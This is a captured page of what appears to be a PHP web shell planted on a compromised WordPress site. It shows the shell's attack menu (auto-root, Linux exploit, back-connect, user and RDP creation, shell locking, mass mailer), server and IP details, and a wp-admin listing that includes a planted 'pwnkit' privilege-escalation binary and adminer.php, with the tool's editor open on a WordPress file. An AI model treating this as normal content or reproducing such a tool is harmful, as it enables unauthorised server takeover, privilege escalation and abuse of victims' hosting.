Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
leranch /
wp-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
import
[ DIR ]
drwx---r-x
includes
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
admin-ajax.php
17.7
KB
-rwxr--r--
admin-footer.php
571
B
-rwxr--r--
admin-functions.php
182
B
-rwxr--r--
admin-header.php
6.46
KB
-rwxr--r--
admin-post.php
432
B
-rwxr--r--
admin.php
2.99
KB
-rwxr--r--
adminer.php
465.43
KB
-rw-r--r--
async-upload.php
1.38
KB
-rwxr--r--
bookmarklet.php
2.25
KB
-rwxr--r--
categories.php
5.34
KB
-rwxr--r--
comment.php
6.82
KB
-rwxr--r--
custom-header.php
11.41
KB
-rwxr--r--
edit-attachment-rows.php
4.14
KB
-rwxr--r--
edit-category-form.php
2.99
KB
-rwxr--r--
edit-comments.php
8.24
KB
-rwxr--r--
edit-form-advanced.php
18.17
KB
-rwxr--r--
edit-form-comment.php
4.34
KB
-rwxr--r--
edit-form.php
3.04
KB
-rwxr--r--
edit-link-categories.php
4.55
KB
-rwxr--r--
edit-link-category-form.php
2.16
KB
-rwxr--r--
edit-link-form.php
14.59
KB
-rwxr--r--
edit-page-form.php
14.43
KB
-rwxr--r--
edit-pages.php
7.14
KB
-rwxr--r--
edit-post-rows.php
5.9
KB
-rwxr--r--
edit-tag-form.php
1.86
KB
-rwxr--r--
edit-tags.php
4.8
KB
-rwxr--r--
edit.php
7.76
KB
-rwxr--r--
export.php
1.43
KB
-rwxr--r--
gears-manifest.php
10.9
KB
-rwxr--r--
import.php
1.41
KB
-rwxr--r--
index-extra.php
514
B
-rwxr--r--
index.php
5.94
KB
-rwxr--r--
install-helper.php
4.05
KB
-rwxr--r--
install.php
4.17
KB
-rwxr--r--
link-add.php
691
B
-rwxr--r--
link-category.php
2.22
KB
-rwxr--r--
link-import.php
3.94
KB
-rwxr--r--
link-manager.php
7.33
KB
-rwxr--r--
link-parse-opml.php
1.72
KB
-rwxr--r--
link.php
2.34
KB
-rwxr--r--
media-upload.php
1.11
KB
-rwxr--r--
media.php
2.96
KB
-rwxr--r--
menu-header.php
5.78
KB
-rwxr--r--
menu.php
6.47
KB
-rwxr--r--
moderation.php
100
B
-rwxr--r--
options-discussion.php
8.01
KB
-rwxr--r--
options-general.php
6.02
KB
-rwxr--r--
options-head.php
230
B
-rwxr--r--
options-misc.php
3.86
KB
-rwxr--r--
options-permalink.php
7.62
KB
-rwxr--r--
options-privacy.php
1.32
KB
-rwxr--r--
options-reading.php
3.56
KB
-rwxr--r--
options-writing.php
6.66
KB
-rwxr--r--
options.php
2.73
KB
-rwxr--r--
page-new.php
916
B
-rwxr--r--
page.php
5.2
KB
-rwxr--r--
plugin-editor.php
5.17
KB
-rwxr--r--
plugins.php
14.44
KB
-rwxr--r--
post-new.php
1.4
KB
-rwxr--r--
post.php
5.57
KB
-rwxr--r--
press-this.php
20.24
KB
-rwxr--r--
profile-update.php
524
B
-rwxr--r--
profile.php
73
B
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
revision.php
6.03
KB
-rwxr--r--
rtl.css
7.32
KB
-rwxr--r--
setup-config.php
6.09
KB
-rwxr--r--
sidebar.php
2.56
KB
-rwxr--r--
templates.php
4.64
KB
-rwxr--r--
theme-editor.php
5.73
KB
-rwxr--r--
themes.php
6.89
KB
-rwxr--r--
update-links.php
1.39
KB
-rwxr--r--
update.php
6.86
KB
-rwxr--r--
upgrade-functions.php
188
B
-rwxr--r--
upgrade.php
2.25
KB
-rwxr--r--
upload.php
7.95
KB
-rwxr--r--
user-edit.php
11.33
KB
-rwxr--r--
users.php
13.97
KB
-rwxr--r--
widgets.php
11.23
KB
-rwxr--r--
wp-admin.css
24.91
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit-category-form.php
<?php if ( ! empty($cat_ID) ) { $heading = __('Edit Category'); $submit_text = __('Edit Category'); $form = '<form name="editcat" id="editcat" method="post" action="categories.php" class="validate">'; $action = 'editedcat'; $nonce_action = 'update-category_' . $cat_ID; do_action('edit_category_form_pre', $category); } else { $heading = __('Add Category'); $submit_text = __('Add Category'); $form = '<form name="addcat" id="addcat" method="post" action="categories.php" class="add:the-list: validate">'; $action = 'addcat'; $nonce_action = 'add-category'; do_action('add_category_form_pre', $category); } ?> <div class="wrap"> <h2><?php echo $heading ?></h2> <div id="ajax-response"></div> <?php echo $form ?> <input type="hidden" name="action" value="<?php echo $action ?>" /> <input type="hidden" name="cat_ID" value="<?php echo $category->term_id ?>" /> <?php wp_nonce_field($nonce_action); ?> <table class="form-table"> <tr class="form-field form-required"> <th scope="row" valign="top"><label for="cat_name"><?php _e('Category Name') ?></label></th> <td><input name="cat_name" id="cat_name" type="text" value="<?php echo attribute_escape($category->name); ?>" size="40" aria-required="true" /><br /> <?php _e('The name is used to identify the category almost everywhere, for example under the post or in the category widget.'); ?></td> </tr> <tr class="form-field"> <th scope="row" valign="top"><label for="category_nicename"><?php _e('Category Slug') ?></label></th> <td><input name="category_nicename" id="category_nicename" type="text" value="<?php echo attribute_escape(apply_filters('editable_slug', $category->slug)); ?>" size="40" /><br /> <?php _e('The “slug” is the URL-friendly version of the name. It is usually all lowercase and contains only letters, numbers, and hyphens.'); ?></td> </tr> <tr class="form-field"> <th scope="row" valign="top"><label for="category_parent"><?php _e('Category Parent') ?></label></th> <td> <?php wp_dropdown_categories(array('hide_empty' => 0, 'name' => 'category_parent', 'orderby' => 'name', 'selected' => $category->parent, 'hierarchical' => true, 'show_option_none' => __('None'))); ?><br /> <?php _e('Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.'); ?> </td> </tr> <tr class="form-field"> <th scope="row" valign="top"><label for="category_description"><?php _e('Description') ?></label></th> <td><textarea name="category_description" id="category_description" rows="5" cols="50" style="width: 97%;"><?php echo wp_specialchars($category->description); ?></textarea><br /> <?php _e('The description is not prominent by default, however some themes may show it.'); ?></td> </tr> </table> <p class="submit"><input type="submit" class="button" name="submit" value="<?php echo $submit_text ?>" /></p> <?php do_action('edit_category_form', $category); ?> </form> </div>
Close